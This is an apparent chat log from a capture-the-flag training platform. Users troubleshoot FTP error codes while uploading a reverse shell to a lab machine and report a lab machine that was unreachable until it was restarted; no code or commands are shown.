eternal summit
lost cove
foggy python
#

Hey anyone of you having issues with ftp put command when uploading a php reverse shell

#

I am working on the watcher room and trying to upload a php reverse shell on ftp server but i cant get it to upload i get a error code 229 on it

grave grove
foggy python
#

Hhmm changed it but still doesnt want to create file

foggy python
#

Now its giving me 553 error

#

But im getting a 200 eprt command succesful

#

Nvm figured it out

restive pulsar
#

Hey! We discussed by three about an issue reaching a machine on crackthehash2, booted up 4 times and could not reach, but an other one showed up (different IP) on the 5th attempt of shutting down-restarting the machine and it worked perfectly. We discussed it in #site-support here:
#site-support message